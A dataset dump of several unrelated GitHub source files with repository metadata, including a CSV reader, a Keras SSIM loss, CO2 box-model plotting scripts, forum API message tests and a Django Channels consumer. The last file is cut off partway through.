blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ae824878f45449c2a0687abe0de8588bb2fc3290 | 9ec057d901fc9a0828895d28af165884b2eeecd4 | /myapp/test.py | 5b6a3c3ad53cd112178fcbb4108c4d61d0a821f9 | [] | no_license | arpit3018/StockPred | f95706acc9aba53c5bb86fea893c5356d3285d75 | 9c8c195788c8c706e2ec880d59b758e544bd60cf | refs/heads/master | 2022-04-02T19:32:53.119344 | 2020-02-15T01:04:20 | 2020-02-15T01:04:20 | 240,580,862 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 648 | py | import csv
file1 = "./companylist.csv"
file2 = "./ind_nifty500list.csv"
# Symbol, Name, Sector
with open(file1) as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
line_count += 1
else:
print(row["Symbol"], row["Name"], row["Sector"], sep='\t')
with open(file2) as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
line_count += 1
else:
print(row["Symbol"], row["Name"], row["Industry"], sep='\t') | [
"rishi.chawla14@gmail.com"
] | rishi.chawla14@gmail.com |
52c45fcb6941676bb95e51b20065f7003e69df4e | 502e97f0ec4f287b8280a546e7f2555ff3a5a1fd | /cnn_3d/loss_ssim.py | 1f9e166d4af572dad02709668df737d66c13e862 | [] | no_license | carlasailer/cnn_ct_pet | d350692be03432e025e33db6296ac33b36bedf08 | 4e256bb73f7ea0ab046c231762001b9f3535bb00 | refs/heads/master | 2020-12-18T23:11:24.048337 | 2020-01-22T10:40:52 | 2020-01-22T10:40:52 | 235,549,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,202 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 25 14:25:02 2019
@author: s1287
"""
import h5py
import os
import keras.backend as K
import numpy as np
def calc_ssim_git(y_true, y_pred):
"""structural similarity measurement system."""
## K1, K2 are two constants, much smaller than 1
K1 = 0.04
K2 = 0.06
## mean, std, correlation
mu_x = K.mean(y_pred)
mu_y = K.mean(y_true)
sig_x = K.std(y_pred)
sig_y = K.std(y_true)
sig_xy = (sig_x * sig_y) ** 0.5
## L, number of pixels, C1, C2, two constants
L = 33
C1 = (K1 * L) ** 2
C2 = (K2 * L) ** 2
ssim = (2 * mu_x * mu_y + C1) * (2 * sig_xy * C2) * 1.0 / ((mu_x ** 2 + mu_y ** 2 + C1) * (sig_x ** 2 + sig_y ** 2 + C2))
return ssim
def calc_ssim(y_true, y_pred):
"""Calculates the structured similarity of two images, ssim is in the range [-1,1]
Parameters:
y_true voxel used for calculation of SSIM
y_pred voxel used for calculation of SSIM
Returns:
ssim_value value of the structured similarity between the two images
"""
# size = y_true.shape
# print('The shape is:')
# print(size)
single_ssim = []
try:
for slice_nr in range(0, y_true.shape[0]):
# slice_ssim = compare_ssim(y_true[slice_nr,:,:], y_pred[slice_nr,:,:], win_size=3)
slice_ssim = compare_ssim(y_true[slice_nr,:,:], y_pred[slice_nr,:,:], win_size=3, gaussian_weights=True)
single_ssim.append(slice_ssim)
ssim_mean = np.mean(single_ssim)
except IndexError:
ssim_mean = 0
return ssim_mean
#def calc_ssim_multichannel (y_true, y_pred):#
# return compare_ssim(y_true, y_pred, multichannel=True, win_size=3)
def ssim_fct(y_true, y_pred):
"""wrapper function to fit into the Keras framework
Parameters:
y_true ground truth voxel
y_pred voxel predicted by network
Returns:
ssim value of the structural similarity, suited as loss function
"""
def ssim(y_true, y_pred):
return -calc_ssim(K.squeeze(y_true), K.squeeze(y_pred))
return ssim
if __name__ == '__main__':
contents = os.listdir('/home/s1287/no_backup/s1287/results_interp/patches_for_CNN/')
filename_test = '/home/s1287/no_backup/s1287/results_interp/patches_for_CNN/' + contents[0]
filename_training = '/home/s1287/no_backup/s1287/results_interp/patches_for_CNN/' + contents[1]
with h5py.File(filename_training, 'r') as file:
training_CT = np.array(file.get('CT'))
training_PET = np.array(file.get('PET'))
with h5py.File(filename_test, 'r') as file:
test_CT = np.array(file.get('CT'))
test_PET = np.array(file.get('PET'))
train_data = training_CT
train_labels = training_PET
test_data = test_CT
test_labels = test_PET
example_PET1 = train_labels[0]
example_PET2 = train_labels[1]
current_ssim = calc_ssim(example_PET1, example_PET2)
current_ssim1 = calc_ssim_multichannel(example_PET1, example_PET2)
print(current_ssim)
print('SSIM Multichannel %d' %current_ssim1)
| [
"40063163+carlasailer@users.noreply.github.com"
] | 40063163+carlasailer@users.noreply.github.com |
be4c81a7307446ad3fdd397b5847433df278b5b2 | 638f3cc43b1a7849ec1328207deed72eb9435565 | /pypad/collab.py | f508dd3ad06395335728ce6e7db17f8e899fd2f6 | [
"MIT"
] | permissive | candyninja001/pypad-old | 48444dea7c6037bbad0cae65e50746353b3d816e | 82bfc104c2524ca54cc415d37d2c21fec471838f | refs/heads/master | 2022-02-10T05:44:02.268337 | 2019-06-30T19:54:48 | 2019-06-30T19:54:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,221 | py | from enum import Enum
from .dev import Dev
class Collab(Enum):
UNKNOWN = -1
NONE = 0
RAGNAROK_ONLINE = 1
TAIKO_NO_TATSUJIN = 2
EMIL_CHRONICLE_ONLINE = 3
GUNMA_NO_YABOU = 5
CRYSTAL_DEFENDER = 6
FAMITSU = 7
PRINCESS_PUNT_SWEET = 8
ANDROID = 9
SHINRABANSHO_CHOCO = 10
CAPYBARA_SAN = 11
FREAK_TOWER = 12
SENGOKU_TENKA_TRIGGER = 13
EVANGELION = 14
SEVEN_ELEVEN = 15
CLASH_OF_CLANS = 16
GROOVE_COASTER = 17
RAGNAROK_ODYSSEY_ACE = 18
DRAGONS_DOGMA_QUEST = 19
TAKAOKA_CITY = 20
MONSTER_HUNTER_4G = 21
BATMAN = 22
THIRTY_ONE_ICECREAM = 23
ANGRY_BIRDS = 24
PUZZLE_AND_DRAGONS_Z = 25
HUNTER_X_HUNTER = 26
SANRIO_CHARACTERS = 27
PAD_BATTLE_TOURNAMENT = 28
BEAMS = 29
DRAGON_BALL = 30
SAINT_SEIYA = 31
ROAD_TO_DRAGON = 32
DIVINE_GATE = 33
SUMMONS_BOARD = 34
PICOTTO_KINGDOM = 35
BIKKURIMAN = 36
ANGRY_BIRDS_EPIC = 37
DC_UNIVERSE = 38
CHIBI_1 = 39 # first round chibis - three kingdoms series
FIST_OF_THE_NORTH_STAR = 40
CHIBI_2 = 41 # second round chibis
CHIBI_3 = 44 # third round chibis
FINAL_FANTASY = 45
GHOST_IN_THE_SHELL = 46
DUEL_MASTERS = 47
ATTACK_ON_TITAN = 48
NINJA_HATTORI_KUN = 49
SHONEN_SUNDAY = 50
CROWS_X_WORST = 51 # TODO VERIFY NO OVERLAP WITH VOLTRON
BLEACH = 52
ACE_ATTORNEY = 55
RUROUNI_KENSHIN = 56
PEPPER = 57
KINNIKUMAN = 58
HIRUNE_HIME = 59
MAGAZINE = 60
MONSTER_HUNTER = 61
KAIBUTSU_KUN = 62
VOLTRON = 63 # TODO VERIFY NO OVERLAP WITH CROW X WORST
FULLMETAL_ALCHEMIST = 65
KING_OF_FIGHTERS = 66
YU_YU_HAKUSHO = 67
PERSONA = 68
COCA_COLA = 69
MAGIC_THE_GATHERING = 70
CHRONO_MAGIA = 71
SEVENTH_REBIRTH = 72
CALCIO_FANTASISTA = 73
POWER_PROS = 74
GINTAMA = 75
SWORD_ART_ONLINE = 76
KAMEN_RIDER = 77
YOKAI_WATCH_W = 78
FATE_STAY_NIGHT = 79
STREET_FIGHTER_V = 80
UMAIBOU = 81
MC_DONALDS = 82
SHAMAN_KING = 83
ERROR_999 = 999
DRAGONBOUNDS_AND_DRAGON_CALLERS = 10001
@classmethod
def _missing_(cls, value):
Dev.log(f'Unknown collab: {value}')
return Collab.UNKNOWN | [
"candyninja001@gmail.com"
] | candyninja001@gmail.com |
5d1a3254422d9a759a333be1f2834e1071f49c20 | 8fbb7e8f83efbfa98e14b941bf2e687403b02d3d | /week 8/function.py | df77be2210a0e8e46f090171fa964f223f014c7e | [] | no_license | alviandk/python-sunmorn | 0c61f6042dbc3ebf897c2c6139590221c1238b9d | c3a06ba846ddea113cc0c451f110dfc05f256be7 | refs/heads/master | 2016-08-08T15:28:53.078910 | 2015-08-09T04:29:56 | 2015-08-09T04:29:56 | 35,749,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 193 | py | # function without parameter and return value
# syntax to definite is "def function_name():"
def say_cool():
print "cooollll"
#syntax to call the function is "function_name()"
say_cool()
| [
"alviandk@GMAIL.COM"
] | alviandk@GMAIL.COM |
67bffd0980d1ea7f4201ae6348603c60f4fb7966 | 42fa1862effc3e494859904b76c43ce2bcd623a0 | /idealised_box_simulations_paper2b.py | 94394f21530d4fa8c134d0b1ed14dcc4aec1a8ec | [] | no_license | PaulHalloran/desktop_python_scripts | 3e83aedf3e232da610b5f7477e4d7e8fb0253f99 | 325e923527278a5c3e9ab8c978f29b2816dab087 | refs/heads/master | 2021-01-01T19:52:06.828997 | 2015-06-27T21:14:10 | 2015-06-27T21:14:10 | 38,155,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,527 | py | import numpy as np
import matplotlib.pyplot as plt
import matplotlib
import matplotlib as mpl
results = np.genfromtxt('/home/ph290/box_modelling/boxmodel_6_box_back_to_basics/results/spg_box_model_qump_results_3.csv',delimiter = ',')
results_stg = np.genfromtxt('/home/ph290/box_modelling/boxmodel_6_box_back_to_basics/results/stg_box_model_qump_results_3.csv',delimiter = ',')
forcing_dir = '/home/ph290/box_modelling/boxmodel_6_box_back_to_basics/forcing_data/co2/'
co2_tmp = np.genfromtxt(forcing_dir+'rcp85_1.txt',delimiter = ',')
co2 = np.zeros([co2_tmp.shape[0],4])
co2[:,0] = np.genfromtxt(forcing_dir+'rcp85_1.txt',delimiter = ',')[:,1]
co2[:,1] = np.genfromtxt(forcing_dir+'rcp85_2.txt',delimiter = ',')[:,1]
co2[:,2] = np.genfromtxt(forcing_dir+'rcp85_3.txt',delimiter = ',')[:,1]
rcp85_yr = np.genfromtxt(forcing_dir+'historical_and_rcp85_atm_co2.txt',delimiter = ',')[:,0]
rcp85 = np.genfromtxt(forcing_dir+'historical_and_rcp85_atm_co2.txt',delimiter = ',')[:,1]
mpl.rcdefaults()
font = {'family' : 'monospace',
'weight' : 'bold',
'family' : 'serif',
'size' : 14}
mpl.rc('font', **font)
plt.close('all')
fig, (ax1, ax2) = plt.subplots(1,2,figsize=(10, 4))
leg_lab = ['y = 1.0285**x +c','y = 1.0265**x +c','y = 1.0305**x +c']
for i in range(3):
ax1.plot(co2[:,i],linewidth = 6,alpha= 0.4,label = leg_lab[i])
ax1.legend(loc = 2,prop={'size':10, 'family' : 'normal','weight' : 'bold'},ncol = 1).draw_frame(False)
#ax1.plot(rcp85_yr-1860,rcp85,'k',linewidth = 6,alpha= 0.4)
ax1.set_xlim([0,240])
ax1.set_ylim([200,1800])
ax1.set_ylabel('atm. CO$_2$ (ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
for i in range(3):
ax2.plot(results[:,0]-results[0,0],results[:,i+1],linewidth = 6,alpha= 0.4)
ax2b = ax2.twinx()
for i in range(3):
ax2b.plot(results[:,0]-results[0,0],results_stg[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '--')
leg_lab2 = ['Subpolar N. Atlantic (left axis)','Subtropical/equatorial (right axis)']
tmp = ax2.plot([0,0],'k',linewidth = 6,alpha= 0.4,label = leg_lab2[0])
tmp2 = ax2.plot([0,0],'k',linewidth = 6,alpha= 0.4,linestyle = '--',label = leg_lab2[1])
ax2.legend(loc = 2,prop={'size':10, 'family' : 'normal','weight' : 'bold'},ncol = 1).draw_frame(False)
tmp.pop(0).remove()
tmp2.pop(0).remove()
ax2.set_ylim([10,31])
ax2.set_ylabel('atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax2.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
ax2.set_xlim([0,240])
#plt.arrow(0,0,0,1, shape='full', lw=3, length_includes_head=True, head_width=.01)
a1 = matplotlib.patches.Arrow(0.5-0.01,0.5+0.01,0.05,0.0, width=0.8,edgecolor='none',facecolor='gray',fill=True,transform=fig.transFigure, figure=fig,alpha=0.25)
fig.lines.extend([a1])
fig.canvas.draw()
plt.tight_layout()
plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_1b.png')
plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_1b.pdf')
plt.show(block = False)
#plt.close('all')
'''
spg-stg difference plots
'''
#for i in range(4):
# ax1.plot(co2[:,i],linewidth = 6,alpha= 0.4)
#
#ax1.set_ylabel('atm. CO$_2$ (ppm)', multialignment='center',fontweight='bold',fontsize = 14)
#ax1.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
#plt.close('all')
colours = ['b','r']
fig, (ax1) = plt.subplots(1,1,figsize=(5, 4))
ax1.plot(results[:,0]-results[0,0],results[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '-',color=colours[0])
ax2 = ax1.twinx()
ax2.plot(results[:,0]-results[0,0],results_stg[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '--',color=colours[1])
ax1.set_xlim([150,160])
min1 = 22
max1 = 27
min1b = -1
max1b = 4
ax1.set_ylim([min1,max1])
ax2.set_ylim([min1b,max1b])
ax1.set_ylabel('atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_ylabel('Subtropical atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
plt.tight_layout()
#plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_2.png')
#plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_2.pdf')
plt.show(block = False)
#plt.close('all')
'''
2
'''
fig, (ax1) = plt.subplots(1,1,figsize=(5, 4))
ax1.plot(results[:,0]-results[0,0],results[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '-',color=colours[0])
ax1.plot(results[:,0]-results[0,0],results_stg[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '--',color=colours[1])
ax1.set_xlim([155,165])
#min1 = 100
#max1 = 160
ax1.set_ylim([min1,max1])
ax1.set_ylabel('atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_ylabel('Subtropical atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
plt.tight_layout()
#plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_2.png')
#plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_2.pdf')
plt.show(block = False)
#plt.close('all')
'''
3
'''
fig, (ax1) = plt.subplots(1,1,figsize=(5, 4))
ax1.plot(results[:,0]-results[0,0],results[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '-',color=colours[0])
ax1.plot(results[:,0]-results[0,0],results_stg[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '--',color=colours[1])
ax1.set_xlim([170,180])
#min1 = 100
#max1 = 160
ax1.set_ylim([min1,max1])
ax1.set_ylabel('atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_ylabel('Subtropical atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
plt.tight_layout()
#plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_2.png')
#plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_2.pdf')
plt.show(block = False)
#plt.close('all')
results = np.genfromtxt('/home/ph290/box_modelling/boxmodel_6_box_back_to_basics/results/rcp85_spg_box_model_qump_results_3.csv',delimiter = ',')
results_stg = np.genfromtxt('/home/ph290/box_modelling/boxmodel_6_box_back_to_basics/results/rcp85_stg_box_model_qump_results_3.csv',delimiter = ',')
mpl.rcdefaults()
font = {'family' : 'monospace',
'weight' : 'bold',
'family' : 'serif',
'size' : 14}
mpl.rc('font', **font)
plt.close('all')
fig, (ax1) = plt.subplots(1,1,figsize=(5, 4))
for i in range(1):
ax1.plot(results[:,0]-results[0,0],results[:,i+1],'k',linewidth = 6,alpha= 0.4)
ax1b = ax1.twinx()
for i in range(1):
ax1b.plot(results[:,0]-results[0,0],results_stg[:,i+1],'k',linewidth = 6,alpha= 0.4,linestyle = '--')
ax1.set_ylabel('spg atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1b.set_ylabel('stg (dasshed) atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_xlim([0,240])
plt.tight_layout()
plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/rcp_85.png')
plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/rcp_85.pdf')
plt.show(block = False)
#plt.close('all')
| [
"paul.halloran@gmail.com"
] | paul.halloran@gmail.com |
c477817d17f893caa0728ca8f24b6d1a92438e18 | 28a05fedfffb11c773c3d4445cea7c525b411443 | /tests/threads/id/messages/createMessages_test.py | e3543f3a9fa8d953acf9f06d222aef3708149f5d | [] | no_license | mdomosla/zadanie2-testy-forum | 9b19740a8dbbced9ce49aeecf453309f96f00e22 | 72d2e82485b6f175d2f0e00a8f366e36a6d19079 | refs/heads/master | 2020-05-25T17:32:26.814582 | 2019-05-22T15:01:44 | 2019-05-22T15:01:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,137 | py | from tests.baseTest import *
from lib.random_generator import RandomGenerator
from lib.api_requests import RequestManager
from grappa import should
from api_endpoints.signup_endpoint import SignupMethods
from api_endpoints.threads_endpoint import ThreadsMethods
from api_endpoints.message_endpoint import MessageMethods
from lib.data_encoder import Encoder
from json.decoder import JSONDecodeError
class CreateMessagesTest(BaseTest):
rand = RandomGenerator()
rm = RequestManager()
encoder = Encoder()
auth_header = None
thread_to_delete = None
@classmethod
def setUpClass(cls):
BaseTest.setUpClass()
account_data = SignupMethods().create_test_account(generate_fields=True)
cls.account_id = account_data[1]['response']['id']
data_to_encode = account_data[0]['username'] + ':' + account_data[0]['password']
encoded_credentials = cls.encoder.encode_data(data_to_encode)
cls.thread_auth_headers = {'Authorization': 'Basic ' + encoded_credentials}
sample_thread = cls.rand.generate_random_string(10)
logging.info('Creating user and sample thread for tests')
result = ThreadsMethods().create_sample_thread(authorization=cls.thread_auth_headers, thread_name=sample_thread,
private=False)
cls.thread_id = result['response']['id']
cls.thread_to_delete = cls.thread_id
cls.auth_header = cls.thread_auth_headers
def setUp(self):
BaseTest.setUp(self)
def test_01_create_max_long_message(self):
message = self.rand.generate_random_string(300)
logging.info('Creating sample message in thread %s' % self.thread_id)
result = MessageMethods(self.thread_id).send_message_in_thread(authorization=self.thread_auth_headers,
message=message)
logging.info('Server returned %s' % result)
result['code'] | should.be.equal.to(200)
result['response']['createdAt'] | should.be.a(int)
result['response']['updatedAt'] | should.be.a(int)
result['response']['id'] | should.be.a(str)
result['response']['id'] | should.not_be.none
result['response']['modelType'] | should.be.equal.to('ThreadMessageModel')
result['response']['user'] | should.be.a(str)
result['response']['user'] | should.be.equal.to(self.account_id)
result['response']['thread'] | should.be.a(str)
result['response']['thread'] | should.be.equal.to(self.thread_id)
result['response']['message'] | should.be.a(str)
result['response']['message'] | should.be.equal.to(message)
result['response']['deleted'] | should.be.a(bool)
result['response']['deleted'] | should.be.equal.to(False)
def test_02_create_min_long_message(self):
message = self.rand.generate_random_string(1)
logging.info('Creating sample message in thread %s' % self.thread_id)
result = MessageMethods(self.thread_id).send_message_in_thread(authorization=self.thread_auth_headers,
message=message)
logging.info('Server returned %s' % result)
result['code'] | should.be.equal.to(200)
result['response']['createdAt'] | should.be.a(int)
result['response']['updatedAt'] | should.be.a(int)
result['response']['id'] | should.be.a(str)
result['response']['id'] | should.not_be.none
result['response']['modelType'] | should.be.equal.to('ThreadMessageModel')
result['response']['user'] | should.be.a(str)
result['response']['user'] | should.be.equal.to(self.account_id)
result['response']['thread'] | should.be.a(str)
result['response']['thread'] | should.be.equal.to(self.thread_id)
result['response']['message'] | should.be.a(str)
result['response']['message'] | should.be.equal.to(message)
result['response']['deleted'] | should.be.a(bool)
result['response']['deleted'] | should.be.equal.to(False)
def test_03_create_too_short_message(self):
message = ''
logging.info('Creating sample message in thread %s' % self.thread_id)
result = MessageMethods(self.thread_id).send_message_in_thread(authorization=self.thread_auth_headers,
message=message)
logging.info('Server returned %s' % result)
result['code'] = 422
result['response']['message'].lower() | should.contain('text has to be between 1 and 300 characters')
def test_04_create_too_long_message(self):
message = self.rand.generate_random_string(301)
logging.info('Creating sample message in thread %s' % self.thread_id)
result = MessageMethods(self.thread_id).send_message_in_thread(authorization=self.thread_auth_headers,
message=message)
logging.info('Server returned %s' % result)
result['code'] = 422
result['response']['message'].lower() | should.contain('text has to be between 1 and 300 characters')
def test_05_create_message_no_message(self):
logging.info('Creating sample message without message in thread %s' % self.thread_id)
result = MessageMethods(self.thread_id).send_message_in_thread(authorization=self.thread_auth_headers)
logging.info('Server returned %s' % result)
result['code'] | should.be.equal.to(409)
result['response']['message'].lower() | should.contain('text required')
def test_06_create_message_in_public_thread_as_another_not_invited_user(self):
account_data = SignupMethods().create_test_account(generate_fields=True)
data_to_encode = account_data[0]['username'] + ':' + account_data[0]['password']
encoded_credentials = self.encoder.encode_data(data_to_encode)
thread_auth_headers = {'Authorization': 'Basic ' + encoded_credentials}
message = self.rand.generate_random_string(50)
logging.info('Creating sample message as another user in public thread %s' % self.thread_id)
result = MessageMethods(self.thread_id).send_message_in_thread(authorization=thread_auth_headers,
message=message)
logging.info('Server returned %s' % result)
result['code'] | should.be.equal.to(403)
result['response']['message'].lower() | should.contain('is not a member of the thread')
def test_07_create_message_in_private_thread_as_another_not_invited_user(self):
sample_thread = self.rand.generate_random_string(10)
result = ThreadsMethods().create_sample_thread(authorization=self.thread_auth_headers,
thread_name=sample_thread,
private=True)
self.thread_id = result['response']['id']
account_data = SignupMethods().create_test_account(generate_fields=True)
data_to_encode = account_data[0]['username'] + ':' + account_data[0]['password']
encoded_credentials = self.encoder.encode_data(data_to_encode)
thread_auth_headers = {'Authorization': 'Basic ' + encoded_credentials}
message = self.rand.generate_random_string(50)
logging.info('Creating sample message as another user in private thread %s' % self.thread_id)
result = MessageMethods(self.thread_id).send_message_in_thread(authorization=thread_auth_headers,
message=message)
logging.info('Server returned %s' % result)
result['code'] | should.be.equal.to(403)
result['response']['message'].lower() | should.contain('is not a member of the thread')
def test_08_create_message_by_non_existing_user(self):
logging.info('Creating sample message by non existing user in public thread %s' % self.thread_id)
thread_auth_headers = {'Authorization': 'Basic ' + self.rand.generate_random_string(10)}
message = self.rand.generate_random_string(50)
try:
result = MessageMethods(self.thread_id).send_message_in_thread(authorization=thread_auth_headers,
message=message)
result | should.be.none
except JSONDecodeError as e:
logging.info('Server responded with %s' % e.doc)
e.doc.lower() | should.contain('unauthorized access')
def test_09_create_message_by_invited_user(self):
account_data = SignupMethods().create_test_account(generate_fields=True)
account_id = account_data[1]['response']['id']
data_to_encode = account_data[0]['username'] + ':' + account_data[0]['password']
encoded_credentials = self.encoder.encode_data(data_to_encode)
thread_auth_headers = {'Authorization': 'Basic ' + encoded_credentials}
logging.info('Inviting user to thread %s' % self.thread_id)
result = ThreadsMethods().invite_user_to_thread(authorization=self.thread_auth_headers,
thread_id=self.thread_id,
user_id=account_id)
logging.info('Server returned %s' % result)
invitation_id = result['response'][0]['id']
message = self.rand.generate_random_string(50)
logging.info('Creating sample message as invited user in thread %s' % self.thread_id)
result = MessageMethods(self.thread_id).send_message_in_thread(authorization=thread_auth_headers,
message=message)
logging.info('Server returned %s' % result)
result['code'] | should.be.equal.to(403)
result['response']['message'].lower() | should.contain('is not a member of the thread')
logging.info('Accepting invitation to a thread %s' % self.thread_id)
result = ThreadsMethods().accept_invitation_to_thread(authorization=thread_auth_headers,
invitation_id=invitation_id, accept=True)
logging.info('Server returned %s' % result)
logging.info('Creating sample message as invited and accepted user in thread %s' % self.thread_id)
result = MessageMethods(self.thread_id).send_message_in_thread(authorization=thread_auth_headers,
message=message)
logging.info('Server returned %s' % result)
result['code'] | should.be.equal.to(200)
def test_10_create_message_by_kicked_user(self):
account_data = SignupMethods().create_test_account(generate_fields=True)
account_id = account_data[1]['response']['id']
data_to_encode = account_data[0]['username'] + ':' + account_data[0]['password']
encoded_credentials = self.encoder.encode_data(data_to_encode)
thread_auth_headers = {'Authorization': 'Basic ' + encoded_credentials}
logging.info('Inviting user to thread %s' % self.thread_id)
result = ThreadsMethods().invite_user_to_thread(authorization=self.thread_auth_headers,
thread_id=self.thread_id,
user_id=account_id)
logging.info('Server returned %s' % result)
invitation_id = result['response'][0]['id']
logging.info('Accepting invitation to a thread %s' % self.thread_id)
result = ThreadsMethods().accept_invitation_to_thread(authorization=thread_auth_headers,
invitation_id=invitation_id, accept=True)
logging.info('Server returned %s' % result)
logging.info('Kicking user from a thread %s' % self.thread_id)
result = ThreadsMethods().kick_user_from_thread(authorization=self.thread_auth_headers,
thread_id=self.thread_id, user_id=account_id)
logging.info('Server returned %s' % result)
message = self.rand.generate_random_string(50)
logging.info('Creating sample message as kicked user in thread %s' % self.thread_id)
result = MessageMethods(self.thread_id).send_message_in_thread(authorization=thread_auth_headers,
message=message)
logging.info('Server returned %s' % result)
result['code'] | should.be.equal.to(403)
result['response']['message'].lower() | should.contain('is not a member of the thread')
@classmethod
def tearDownClass(cls):
if cls.auth_header is not None and cls.thread_to_delete is not None:
logging.info('Deleting sample thread created for tests')
ThreadsMethods().delete_thread(authorization=cls.auth_header, thread_id=cls.thread_to_delete) | [
"michal.domoslawski@codahead.com"
] | michal.domoslawski@codahead.com |
640b1ecbbff09f8d8ae3a1a9b0aa9c8146f0a093 | 4ba6207a7e4aa84da494e0f6d811eca606659b73 | /groupster/migrations/0003_jobseeker_resume.py | 5f0af9769b89646d52c1f168f716bf3a2099c0e6 | [] | no_license | jkol36/groupster | da5d9d4b882cd9df7a4b187b65cdc3fe8175e794 | 5967cb7b2689dec760727c7534ff0f73a6901ba4 | refs/heads/master | 2021-01-02T09:19:49.841001 | 2015-06-10T18:57:37 | 2015-06-10T18:57:37 | 35,061,183 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 424 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('groupster', '0002_remove_jobseeker_resume'),
]
operations = [
migrations.AddField(
model_name='jobseeker',
name='resume',
field=models.FileField(default=None, upload_to=b''),
),
]
| [
"jonathankolman@gmail.com"
] | jonathankolman@gmail.com |
857103b7046057d8706f792b275140f428e91cfe | d3aaceff6cc95097f9715b9517806a47d38133c0 | /bbakdoc/events/consumers.py | 041dd11893da0a68aa062b1a63489a99ccdda2fd | [] | no_license | SELO77/django-template2 | 5f7b4febdb4ea056cf833ec3125f1935b55f4c69 | b5eafd736b2a8065fbc690b6378d3f4e8ee64834 | refs/heads/master | 2020-05-17T03:05:38.151735 | 2019-06-10T12:42:35 | 2019-06-10T12:42:35 | 183,469,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,955 | py | import json
import logging
from channels.db import database_sync_to_async
from channels.generic.websocket import AsyncWebsocketConsumer, WebsocketConsumer, AsyncJsonWebsocketConsumer
# @database_sync_to_async
# def get_user_email(scope):
# return scope.user.email
from bbakdoc.events.models import EventQuestion
class EventConsumer(AsyncJsonWebsocketConsumer):
# class EventConsumer(WebsocketConsumer):
async def connect(self):
self.room_name = self.scope['url_route']['kwargs']['room_name']
self.room_group_name = f'event_{self.room_name}'
# Join room group
# Add exception handling when redis turn off
await self.channel_layer.group_add(
self.room_group_name,
self.channel_name,
)
await self.accept()
async def disconnect(self, code):
await self.channel_layer.group_discard(
self.room_group_name,
self.channel_name,
)
@database_sync_to_async
def create_question(self, content, questioner):
obj = EventQuestion.objects.create(
event_id=int(self.room_name)-1000,
content=content,
questioner=questioner,
)
return obj
# Receive message from WebSocket
async def receive_json(self, content, **kwargs):
question = content['question']
questioner = content.get('questioner', 'Anonymous')
question_obj = await self.create_question(question, questioner)
# Send message to room group
